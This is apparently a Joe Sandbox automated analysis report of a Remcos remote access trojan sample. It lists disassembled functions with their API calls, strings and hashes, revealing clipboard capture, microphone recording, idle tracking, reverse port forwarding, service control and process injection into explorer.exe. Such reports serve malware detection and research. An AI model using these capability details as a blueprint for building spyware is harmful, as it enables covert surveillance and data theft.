                                                                                              Similarity
                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                                              • API String ID: 911427763-3954389425
                                                                                              • Opcode ID: 02f84ffb516750aa32a357c47b04495fe877c68175f4569b0908d1198096cb1f
                                                                                              • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                              • Opcode Fuzzy Hash: 02f84ffb516750aa32a357c47b04495fe877c68175f4569b0908d1198096cb1f
                                                                                              • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                                              Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                              • __dosmaperr.LIBCMT ref: 0043A926
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                              • __dosmaperr.LIBCMT ref: 0043A963
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                              • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                              • _free.LIBCMT ref: 0043A9C3
                                                                                              • _free.LIBCMT ref: 0043A9CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                              • String ID:
                                                                                              • API String ID: 2441525078-0
                                                                                              • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                              • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                              • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                              • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                              Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                              • GetMessageA.USER32 ref: 0040556F
                                                                                              • TranslateMessage.USER32(?), ref: 0040557E
                                                                                              • DispatchMessageA.USER32(?), ref: 00405589
                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                              • API String ID: 2956720200-749203953
                                                                                              • Opcode ID: 00a4ac9b8b9375f9357bac4ec224a6a1ee1df638548007e1c1babebbcaec40ed
                                                                                              • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                              • Opcode Fuzzy Hash: 00a4ac9b8b9375f9357bac4ec224a6a1ee1df638548007e1c1babebbcaec40ed
                                                                                              • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                              Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                              • String ID: 0VG$0VG$<$@$Temp
                                                                                              • API String ID: 1704390241-2575729100
                                                                                              • Opcode ID: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                                              • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                              • Opcode Fuzzy Hash: fdfef061a0c845b66634ed9213ec91d51d63ab98c4c1b6a43026fae5df42adc0
                                                                                              • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                              Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenClipboard.USER32 ref: 0041697C
                                                                                              • EmptyClipboard.USER32 ref: 0041698A
                                                                                              • CloseClipboard.USER32 ref: 00416990
                                                                                              • OpenClipboard.USER32 ref: 00416997
                                                                                              • GetClipboardData.USER32 ref: 004169A7
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                              • CloseClipboard.USER32 ref: 004169BF
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                              • String ID: !D@
                                                                                              • API String ID: 2172192267-604454484
                                                                                              • Opcode ID: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                                                              • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                              • Opcode Fuzzy Hash: 504df0997904e7872ebe6ecfb3ee4e253f038a0ef8a597049df6207b31d9887a
                                                                                              • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                              Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                              • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                              • String ID:
                                                                                              • API String ID: 297527592-0
                                                                                              • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                                                              • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                              • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                                                              • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                              Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                              • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                              • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                              • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                              Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 004481B5
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 004481C1
                                                                                              • _free.LIBCMT ref: 004481CC
                                                                                              • _free.LIBCMT ref: 004481D7
                                                                                              • _free.LIBCMT ref: 004481E2
                                                                                              • _free.LIBCMT ref: 004481ED
                                                                                              • _free.LIBCMT ref: 004481F8
                                                                                              • _free.LIBCMT ref: 00448203
                                                                                              • _free.LIBCMT ref: 0044820E
                                                                                              • _free.LIBCMT ref: 0044821C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                              • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                              • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                              • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                              Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Eventinet_ntoa
                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                              • API String ID: 3578746661-3604713145
                                                                                              • Opcode ID: cf000610a0d303568da549d2052d12cf92e8b00e1ce298f6290d84e0bd91cd72
                                                                                              • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                              • Opcode Fuzzy Hash: cf000610a0d303568da549d2052d12cf92e8b00e1ce298f6290d84e0bd91cd72
                                                                                              • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                              Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                              • API String ID: 3527080286-3064271455
                                                                                              • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                              • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                              • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                              • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                              Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                              • API String ID: 1462127192-2001430897
                                                                                              • Opcode ID: c5ffc7576fca46f67fe7a2dad330c9118b7d8c55f8f237e319bd0bae48937816
                                                                                              • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                              • Opcode Fuzzy Hash: c5ffc7576fca46f67fe7a2dad330c9118b7d8c55f8f237e319bd0bae48937816
                                                                                              • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                              Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess
                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                              • API String ID: 2050909247-4242073005
                                                                                              • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                              • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                              • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                              • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                              Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strftime.LIBCMT ref: 00401D50
                                                                                                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                              • API String ID: 3809562944-243156785
                                                                                              • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                              • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                              • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                                              • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                              Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                              • int.LIBCPMT ref: 00410EBC
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                              • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                              • String ID: ,kG$0kG
                                                                                              • API String ID: 3815856325-2015055088
                                                                                              • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                              • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                              • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                              • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                              Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                              • waveInStart.WINMM ref: 00401CFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                              • String ID: dMG$|MG$PG
                                                                                              • API String ID: 1356121797-532278878
                                                                                              • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                              • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                              • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                              • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                              Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                              • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                              • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                              • GetMessageA.USER32 ref: 0041D591
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                              • String ID: Remcos
                                                                                              • API String ID: 1970332568-165870891
                                                                                              • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                              • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                              • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                              • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                              Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                              • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                              • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                              • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                              Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                              • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                              • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                              • __freea.LIBCMT ref: 00454083
                                                                                              • __freea.LIBCMT ref: 0045408F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                              • String ID:
                                                                                              • API String ID: 201697637-0
                                                                                              • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                              • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                              • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                              • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                              Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
